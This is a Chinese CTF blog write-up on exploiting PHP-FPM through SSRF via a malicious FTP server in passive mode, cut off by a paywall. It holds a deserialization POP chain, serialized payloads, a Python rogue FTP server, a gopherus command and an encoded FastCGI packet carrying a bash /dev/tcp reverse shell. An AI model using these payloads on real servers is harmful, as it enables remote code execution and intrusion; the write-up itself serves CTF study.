两道CTF题--FTP被动模式打php-fpm

已于 2022-02-25 17:39:58 修改
阅读量2k 收藏 4
点赞数 2
分类专栏: CTF训练日记 文章标签: php 开发语言 后端
于 2022-02-25 17:24:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/unexpectedthing/article/details/123137693
版权
本文探讨了如何通过FTP被动模式触发PHP-FPM的SSRF漏洞,实现文件上传、命令执行,以及如何绕过安全限制如open_basedir和disable_functions。还包括SUID提权和防护措施。重点在于FastCGI攻击手段和防御技术的实践应用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

原理–FTP打php-fpm,fastcgi

漏洞代码

<?php
$contents = file_get_contents($_GET['viewFile']);
file_put_contents($_GET['viewFile'], $contents);

这里读取路径viewFile,之后写回文件中。这看似什么都没有做。

这份代码可以用来攻击PHP-FPM

如果一个客户端试图从FTP服务器上读取文件,服务器会通知客户端将文件的内容读取(或写)到一个特定的IP和端口上。而且,这里对这些IP和端口没有进行必要的限制。例如,服务器可以告诉客户端连接到自己的某一个端口。

现在如果我们使用viewFile=ftp://evil-server/file.txt那么会发生:

首先通过 file_get_contents() 函数连接到我们的FTP服务器,并下载file.txt。
然后再通过 file_put_contents() 函数连接到我们的FTP服务器,并将其上传回file.txt。

那此时,在它尝试使用file_put_contents()上传回去时,我们告诉它把文件发送到127.0.0.1:9001(fpm的端口,默认是9000)
那么,我们就在这中间造成了一次SSRF,攻击php-fpm

[陇原战疫2021网络安全大赛]eaaasyphp

考点

  1. 反序列化–pop链的构成

  2. FTP的被动模式打FPM

思路总结

先看到pop链找信息,利用phpinfo,发现了fastcgi,然后利用FTP的被动模式打fpm

通过pop链向服务器写入文件,文件名为FTP服务器位置,而FTP服务器会将文件内容传到一个指定的IP地址,这个ip地址就是fastcgi的位置,加上文件内容的代码执行,从而实现了一个SSRF,反射shell。

解题

直接先看首页代码

<?php

class Check {
   
    public static $str1 = false;
    public static $str2 = false;
}


class Esle {
   
    public function __wakeup()
    {
   
        Check::$str1 = true;
    }
}


class Hint {
   

    public function __wakeup(){
   
        $this->hint = "no hint";
    }

    public function __destruct(){
   
        if(!$this->hint){
   
            $this->hint = "phpinfo";
            ($this->hint)();
        }  
    }
}


class Bunny {
   

    public function __toString()
    {
   
        if (Check::$str2) {
   
            if(!$this->data){
   
                $this->data = $_REQUEST['data'];
            }
            file_put_contents($this->filename, $this->data);
        } else {
   
            throw new Error("Error");
        }
    }
}

class Welcome {
   
    public function __invoke()
    {
   
        Check::$str2 = true;
        return "Welcome" . $this->username;
    }
}

class Bypass {
   

    public function __destruct()
    {
   
        if (Check::$str1) {
   
            ($this->str4)();
        } else {
   
            throw new Error("Error");
        }
    }
}

if (isset($_GET['code'])) {
   
    unserialize($_GET['code']);
} else {
   
    highlight_file(__FILE__);
}

这就是个常规的pop链的构成。

几个魔法函数:

__wakeup():当调用unserialize时触发
__toString():当类被当作字符串时调用
__invoke():当把类当作函数处理时调用
先看phpinfo():

方法1:

<?php
class Hint {
   

    public function __wakeup(){
   
        $this->hint = "no hint";
    }

    public function __destruct(){
   
        if(!$this->hint){
   
            $this->hint = "phpinfo";
            ($this->hint)();
        }
    }
}
$a=new Hint();
echo serialize($a);

但是需要绕过__wakeup

PHP7 < 7.0.10:反序列化时变量个数大于实际是会绕过

这种不行,但是我们可以利用负数就可以绕过

?code=O:4:"Hint":-1:{}

方法2

$a=new Bypass();
$a->aaa=new Esle();
$a->str4='phpinfo';
echo serialize($a);

得到:

?code=O:6:"Bypass":2:{s:3:"aaa";O:4:"Esle":0:{}s:4:"str4";s:7:"phpinfo";}

看到phpinfo有FastCGI和这儿

file_put_contents($this->filename, $this->data);//代表着上传文件

想到了利用FTP(文件传输协议)的被动模式打FastCGI。

我们先尝试写入shell
$check = new Check();
$esle = new Esle();

$a = new Bypass();
$b = new Welcome();
$c = new Bunny();

$c->filename = "shell.txt";
$c->data = "123456";

$b->username = $c;
$b->bbb = $check;
$a->aaa = $esle;
$a->str4 = $b;

echo serialize($a);

但是无回显,不行。

FTP的被动模式打FastCGI

FTP 协议的被动模式:客户端试图从FTP服务器上读取/写入一个文件,服务器会通知客户端将文件的内容读取到一个指定的IP和端口上,我们可以指定到127.0.0.1:9000,这样就可以向目标主机本地的 PHP-FPM 发送一个任意的数据包,从而执行代码,造成SSRF

搭建恶意ftp服务器

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0',123)) #端口可改
s.listen(1)
conn, addr = s.accept()
conn.send(b'220 welcome\n')
#Service ready for new user.
#Client send anonymous username
#USER anonymous
conn.send(b'331 Please specify the password.\n')
#User name okay, need password.
#Client send anonymous password.
#PASS anonymous
conn.send(b'230 Login successful.\n')
#User logged in, proceed. Logged out if appropriate.
#TYPE I
conn.send(b'200 Switching to Binary mode.\n')
#Size /
conn.send(b'550 Could not get the file size.\n')
#EPSV (1)
conn.send(b'150 ok\n')
#PASV
conn.send(b'227 Entering Extended Passive Mode (127,0,0,1,0,9000)\n') #STOR / (2)
conn.send(b'150 Permission denied.\n')
#QUIT
conn.send(b'221 Goodbye.\n')
conn.close()

然后通过Nxshell在服务器上启动python3 ftp.py

(切记需要先cd到当前目录)

利用gopherus生成发向FPM的数据包

python gopherus.py --exploit fastcgi
/var/www/html/index.php
bash -c "bash -i >& /dev/tcp/ip/39543 0>&1"

只要 _ 后面的内容

%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%06%06%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH108%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%18SCRIPT_FILENAME%20/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00l%04%00%3C%3Fphp%20system%28%27%20bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/ip/10000%200%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00

写pop链

<?php
class Check {
   
public static $str1 = false;
public static $str2 =
最低0.47元/天 解锁文章
[网络安全自学篇] 九十一.阿里云搭建LNMP环境及实现PHP自定义网站IP访问 (1)
杨秀璋的专栏
07-25 6601
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。本文主要分享作阿里云搭建LNMP环境及实现PHP自定义网站IP访问,同时详细介绍走过的坑,还发了朋友圈求助大家,再次感谢。本来想重新设置一个专栏分享基于阿里云的PHP网站搭建,但考虑到搞安全的也会面临各种靶场及个人网站搭建的情况,所以将这篇文章放置在“网络安全自学篇”中,后续还会分享PHP如何记录后台IP及Python定位经纬度等知识,希望对您有所帮助~
分享国外安全团队及工具
热门推荐
专注企业信息安全-sec
03-19 1万+
名称 版 描述 主页 0trace 1.5 跳跃枚举工具 http://jon.oberheide.org/0trace/ 3proxy 0.7.1.1 微小的免费代理服务器。 http://3proxy.ru/ 3proxy-win32的 0.7.1....
CTF-FTP后门利用
墨鱼菜鸡
09-10 361
环境 kali 192.168.20.128 靶机 192.168.20.130 链接:https://pan.baidu.com/s/1ymhZ7ZpEHFnorrkguaYMTA 提取码:xb6o 信息探测 发现漏洞 searchsploit cat /usr/share/exploitdb/exploits/linux/r...
CTFHub WP PHP-FPM
m0_62879498的博客
04-09 892
CTFHub WP PHP-FPM PHP-FPM未授权访问漏洞 早期的web服务器只能处理html等静态服务器,但是随着 技术的发展出现的动态语言,web服务器无法处理。这时候出现了各种语言的解释器,但是web服务器如何于语言解释器进行沟通,如何去判断是什么语言,这时候 cgi协议应运而生。只要我们按照cgi协议去编写代码,就可以被服务器识别。 但是 web服务器每收到一个请求,都会去请求一个 cgi程序 ,解析完成结束进程。这样的话,假如请求次数过多,每一个请求都会进行一次 开启、结束,造成了资源的浪费
CTF实验:FTP服务
floyd_art的博客
03-29 803
FTP介绍 FTP 是File Transfer Protocol(文件传输协议)的英文简称,而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。基于不同的操作系统有不同的FTP应用程序,而所有这些应用程序都遵守同一种协议以传输文件。在FTP的使用当中,用户经常遇到两个概念:“下载”(Download)和"上传"(Upload)...
php ftp主动,php ftp 主动模式 被动模式
weixin_28791139的博客
03-18 360
PHP Error:Warning: ftp_fget() [function.ftp-fget]: Illegal PORT command. in /www/php/ftp_connect.php on line 53Error: Could not download fileFile Transfer Protocol(文件传输协议) ,用来在两台计算机之间互相传送文件。相比于HTTP,FT...
php ftp 主动模式 被动模式
weixin_34301307的博客
01-26 819
PHP Error:Warning: ftp_fget() [function.ftp-fget]: Illegal PORT command. in /www/php/ftp_connect.php on line 53Error: Could not download fileFile Transfer Protocol(文件传输协议) ,用来在两台计算机之间互相传送文件...
php主动式,php ftp 主动模式 被动模式
weixin_29164497的博客
03-13 270
PHP Error:Warning: ftp_fget() [function.ftp-fget]: Illegal PORT command. in /www/php/ftp_connect.php on line 53Error: Could not download fileFile Transfer Protocol(文件传输协议) ,用来在两台计算机之间互相传送文件。相比于HTTP,FT...
php ftp 被动模式,ftp主动模式与被动模式——为什么连接不上FTP服务器
weixin_34298263的博客
03-19 531
ftp不同于一般的服务,该服务需要同时开启两个端口,一个端口是命令通道,另一个端口为数据传输通道。根据数据传输通道建立的不同,分为了主动模式和被动模式。这里,详细的讲述下主动模式的工作流程,以及碰到问如何去解决。主动模式流程命令通道的建立。客户端会随机取出一个大于1024的端口与服务器端的21端口建立连接,当连接建立好的以后,客户端就可以通过该连接来对ftp服务执行命令,比如查询文件名、上传文件...
evilFTP:evilFTP是一组脚本,旨在扩展利用SSRF问时所具有的功能
03-04
evilFTP是一组脚本,在利用服务器端请求伪造(SSRF)问时,会对过度信任的FTP客户端实施一些攻击,以扩展我们的功能。 脚本托管着一个恶意的FTP服务器,并且运行攻击所需的全部就是让客户端与FTP服务器进行交互(例如,下载文件,列出目录内容)。 尽管前提条件很简单,但在实践中让攻击者具有引导客户端与FTP服务器进行交互的能力并不是很常见。 在少数可能的情况下,这是在Web浏览器的上下文中,因为页面的内容可以由攻击者控制,并且可能包含对FTP服务器托管资源的引用。 另一个有趣的情况是,当我们处理SSRF问时,这也是evilFTP的主要目标。 使用evilFTP并提供一种SSRF,您还可以获得: 可靠的TCP端口扫描 TCP服务标语披露 服务器专用IP披露 可靠的TCP端口扫描: 这是FTP反弹攻击的一种变体,但是由于我们在攻击客户端,所以我们使用被动模式,而不是使用主动模式。
CTFshow刷日记-WEB-PHPCVE(web311-315)包括PHP-fpm远程代码执行,PHPimap_open函数任意命令执行,PHP-CGI远程代码执行,XDebug 远程调试漏洞
Love&Share
10-03 3176
web311-CVE-2019-11043-PHP-fpm远程代码执行漏洞 提示:似曾相识,就这一个文件,不用扫描 注释中只有一个<!-- cve-->用burp抓包发现响应行中的X-Powered-By字段很可疑 谷歌之后发现该PHP版本存在漏洞:PHP 远程代码执行漏洞(CVE-2019-11043 漏洞原理 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码 向Nginx + PHP-FP
SSRF 攻击PHP-FPM(FastCGI 攻击):学习总结仅供参考
L2329794714的博客
03-05 2171
一、FastCGI 快速通用网关协议,fastcgi 和cgi 解决的问一样,都是在解决http服务器(Apache、Nginx、IIS等)和其他应用程序(为客户端处理数据的程序 比如:学校官网程序)之间通信问,区别在与处理方式的不同而有。 CGI 方式在每次http服务器收到一个http数据之后就行创建一个CGI进程,当数据处理完后立即销毁 ...
CTF--8.FTP服务后门利用
woo233的博客
09-13 1003
FTP是File Transfer Protocol(文件传输协议)的英文简称,而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。基于不同的操作系统有不同的FTP应用程序,而所有这些应用程序都遵守同一种协议以传输文件。在FTP的使用当中,用户经常遇到两个概念:"下载”(Download)和上传(Upload)。"下载"文件就是从远程主机拷贝文件至自己的计算机上,"上传"文件就是将文件从自己的计算机中拷贝至远程主机上。
CTF-FTP服务后门利用
zhangpeng999123的博客
06-01 959
环境 Kali ip 192.168.1.17 SSH靶机ip 192.168.1.18 FTP、File transfer protocol文件传输协议,同时它也是一个应用程序。下载和上传就是用这个协议。 同样开始用netdiscover发现靶机ip后,用nmap探测开启的端口或服务。 发现开启了ssh,http和ftp这三个服务。 我们发现了ftp的版本号,我们可...
ctf训练 服务安全FTP服务
qq_43799246的博客
12-02 427
ctf训练 服务安全FTP服务 FTP介绍 FTP是File Transfer Protocol(文件传输协议)的英文简称,而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。基于不同的操作系统有不同的FTP应用程序,而所有这些应用程序都遵守同一种协议以传输文件。在FTP的使用当中,用户经常遇到两个概念:"下载”(Downloac)和上传(Upload)。"下载"文件就是从远程主机考贝文件至自己的计算机上,"上传"文件就是将文件从自己的计
CTF训练笔记(四)- FTP服务后门利用
morrino的博客
04-19 3128
对于开放了FTP、SSH、Telnet等服务的系统,可以尝试一些对应服务版本的漏洞代码; 对于系统一定要注意利用现成的EXP来拿到靶机root权限。 如果靶机开启了多个服务,貌似有很多不同方法可以拿到root权限,那就用最简单的方法。 本次渗透测试利用了已经存在的EXP直接一步到位地拿到了靶机的root权限,极大地提升了获取flag的速度。 [CTF训练笔记系列 - 快速导航](https://blog.csdn.net/morrino/article/details/116036237)
file_put_contents + php-fpm 如何命令执行?
conman网络安全
06-21 685
序 在阅读Laravel debug rce[1]的文章时,感叹文章中的技巧之余,有一句话引起了我的注意。 It is well-known that, if you can send an arbitrary binary packet to the PHP-FPM service, you can execute code on the machine. 众所周知,我不知呀! 本文学习file_put_contents + FTP + php-fpm的命令执行。 原理 参考[2],我们可以得知,PHP-
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值